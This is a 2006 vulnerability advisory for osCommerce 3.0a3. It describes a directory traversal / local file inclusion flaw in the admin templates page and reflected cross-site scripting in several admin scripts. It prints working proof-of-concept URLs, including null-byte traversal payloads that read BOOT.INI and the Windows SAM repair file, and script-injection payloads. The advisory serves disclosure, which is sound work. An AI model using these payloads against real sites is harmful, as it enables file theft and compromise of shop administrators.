############################################ Oscommerce traversal arbitrary file access Vendor:http://www.oscommerce.com/about/news,125 Advisore:http://lostmon.blogspot.com/2006/12 /oscommerce-traversal-arbitrary-file.html Vendor notify:NO Exploit available: YES ########################################### osCommerce contains a flaw that allows a remote traversal arbitrary file access.This flaw exists because the application does not validate filter variable upon submission to admin/templates_boxes_layout.php script.This could allow a remote authenticated administrator to create a specially crafted URL that would execute '../' directory traversal characters to view files on the target system with the privileges of the target web service. #################### versions #################### Oscommerce 3.0a3 ################### SOLUTION ################### No solution was available at this time. ################ timeline ################ Discovered:11-11-2006 vendor notify:----- vendor response:---- disclosure:07-12-2006 ################# Examples ################# ###################### traversal file access ###################### wen we try to open http://localhost/oscommerce/admin/templates_boxes_layout.php? set=boxes&filter=[SOME WORD]&lID=27 the aplication returns a full path disclosure and returns this error: Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:\AppServ\www\ oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13 Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear') in C:\AppServ\www\oscommerce\admin\templates\pages\templates_ boxes_layout.php on line 13 the aplication add the .php extension to our [SOME WORD] ummm and it searh for the file in a folder inside webserver we can include any php file located on the web server in the aplication and it is executed(local file inclusion) http://[victim]/admin/templates_boxes_layout.php? set=boxes&filter=../../our_evil_php_file&lID=27 if we try to read a file outside webserver folder with a non php extension can try for test this... &filter=../../../../file.extension%00 for look for example boot.ini in a windows system http://localhost/oscommerce/admin/templates_boxes_layout.php? set=boxes&filter=../../../../BOOT.INI%00&lID=27 http://localhost/oscommerce/admin/templates_boxes_layout.php? set=content&filter=../../../../windows/repair/sam%00&lID=27 ##################### Cross site scripting ##################### http://localhost/oscommerce/admin/modules.php?set=shipping %22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://localhost/definitiva/admin/customers.php?selected_box=customers %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E http://localhost/oscommerce/admin/languages_definitions.php?lID=1 %22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT %3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product ######################## €nd ##################### Thnx to Estrella to be my ligth. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....